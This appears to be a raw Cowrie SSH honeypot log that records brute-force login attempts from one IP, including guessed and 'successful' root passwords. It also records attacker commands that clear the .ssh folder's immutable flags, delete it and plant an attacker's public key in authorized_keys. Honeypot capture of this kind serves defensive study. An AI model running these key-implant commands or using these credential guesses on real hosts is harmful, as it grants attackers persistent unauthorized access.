{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:49.289960Z","src_ip":"212.227.235.229","session":"72d91699d6cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57522,"dst_ip":"1.2.3.4","dst_port":22,"session":"efb28c5b00cd","protocol":"ssh","message":"New connection: 212.227.235.229:57522 (1.2.3.4:22) [session: efb28c5b00cd]","sensor":"my-vps","timestamp":"2025-09-09T06:10:53.775917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:10:53.776932Z","src_ip":"212.227.235.229","session":"efb28c5b00cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:10:53.863584Z","src_ip":"212.227.235.229","session":"efb28c5b00cd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin#123","message":"login attempt [admin/admin#123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:10:54.252450Z","src_ip":"212.227.235.229","session":"efb28c5b00cd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:55.342306Z","src_ip":"212.227.235.229","session":"efb28c5b00cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7933f4db9b1","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: e7933f4db9b1]","sensor":"my-vps","timestamp":"2025-09-09T06:10:59.045129Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:59.132836Z","src_ip":"212.227.235.229","session":"e7933f4db9b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50520,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ce19934a39d","protocol":"ssh","message":"New connection: 212.227.235.229:50520 (1.2.3.4:22) [session: 8ce19934a39d]","sensor":"my-vps","timestamp":"2025-09-09T06:11:06.799823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:11:06.800701Z","src_ip":"212.227.235.229","session":"8ce19934a39d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:11:07.044048Z","src_ip":"212.227.235.229","session":"8ce19934a39d"}
{"eventid":"cowrie.login.failed","username":"test","password":"Test@123","message":"login attempt [test/Test@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:11:08.019983Z","src_ip":"212.227.235.229","session":"8ce19934a39d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:11:09.266648Z","src_ip":"212.227.235.229","session":"8ce19934a39d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43068,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe9862cda60c","protocol":"ssh","message":"New connection: 212.227.235.229:43068 (1.2.3.4:22) [session: fe9862cda60c]","sensor":"my-vps","timestamp":"2025-09-09T06:12:02.238899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:02.240218Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:02.419274Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test.1234567","message":"login attempt [root/Test.1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:12:03.184274Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:12:03.604599Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:12:03.605751Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:12:03.606589Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:03.966618Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:12:04.206499Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.209219Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.397880Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.398774Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"0212e59b300f","protocol":"ssh","message":"New connection: 212.227.235.229:43778 (1.2.3.4:22) [session: 0212e59b300f]","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.555551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.556468Z","src_ip":"212.227.235.229","session":"0212e59b300f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:04.735382Z","src_ip":"212.227.235.229","session":"0212e59b300f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:12:05.469752Z","src_ip":"212.227.235.229","session":"0212e59b300f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:06.649905Z","src_ip":"212.227.235.229","session":"0212e59b300f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44598,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1a8fc590642","protocol":"ssh","message":"New connection: 212.227.235.229:44598 (1.2.3.4:22) [session: c1a8fc590642]","sensor":"my-vps","timestamp":"2025-09-09T06:12:06.832795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:06.840868Z","src_ip":"212.227.235.229","session":"c1a8fc590642"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:07.015320Z","src_ip":"212.227.235.229","session":"c1a8fc590642"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:12:07.724725Z","src_ip":"212.227.235.229","session":"c1a8fc590642"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:07.905745Z","src_ip":"212.227.235.229","session":"c1a8fc590642"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:07.908801Z","src_ip":"212.227.235.229","session":"fe9862cda60c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48094,"dst_ip":"1.2.3.4","dst_port":22,"session":"05a837ee46ec","protocol":"ssh","message":"New connection: 212.227.235.229:48094 (1.2.3.4:22) [session: 05a837ee46ec]","sensor":"my-vps","timestamp":"2025-09-09T06:12:32.284711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:32.285593Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:32.528279Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz#edc","message":"login attempt [root/!qaz#edc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:12:33.541085Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:12:34.047875Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:12:34.048583Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:12:34.049544Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:34.578373Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:12:34.886497Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:12:34.887213Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:12:35.131922Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:12:35.132849Z","src_ip":"212.227.235.229","session":"05a837ee46ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48980,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c37aee337f3","protocol":"ssh","message":"New connection: 212.227.235.229:48980 (1.2.3.4:22) [session: 3c37aee337f3]","sensor":"my-vps","timestamp":"2025-09-09T06:12:35.375746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:12:35.376598Z","src_ip":"212.227.235.229","session":"3c37aee337f3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:12:35.621549Z","src_ip":"212.227.235.229","session":"3c37aee337f3"}
